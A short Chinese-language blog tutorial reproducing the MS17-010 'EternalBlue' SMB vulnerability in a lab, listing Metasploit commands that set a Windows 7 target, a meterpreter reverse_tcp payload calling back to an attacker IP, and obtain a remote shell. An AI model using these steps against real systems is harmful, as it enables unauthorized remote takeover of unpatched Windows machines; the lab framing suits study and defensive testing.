MS17-010永恆之藍漏洞復現

0x01:溫馨提示
微軟已於2017 年 發佈MS17-010補丁,修復了“永恆之藍”攻擊的系統漏洞,一定要及時更新Windows系統補丁。
本次只是簡易的復現MS17-010,成功的水準就是取得Shell即可。
0x02:復現環境
    Windows7 Ultimate 7601 Service Pack 1 x64

 

    Kali linux
0x03:復現過程
1、運行我們的神器“Msfconsole”。
 
root@kali:/home/kali# msfconsole
2、查找ms17-010的模塊。
msf5 > search ms17-010
3、選擇一個合適的exploit。
(我們這裏使用第二個,windows/smb/ms17_010_eternalblue)
msf5 > use 2
 
4、設置靶機IP:192.168.0.102
set RHOST 192.168.0.102
5、設置exploit windows/x64/meterpreter/reverse_tcp
set payload windows/x64/meterpreter/reverse_tcp
6、設置攻擊機IP:192.168.0.106
set lhost 192.168.0.106
7、運行
Run

 

8、觀看結果
提示“Win”則代表成功。
目前只是meterpreter的權限,那麼我們輸入shell回車,即可進入Windows的CMD界面。
 
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章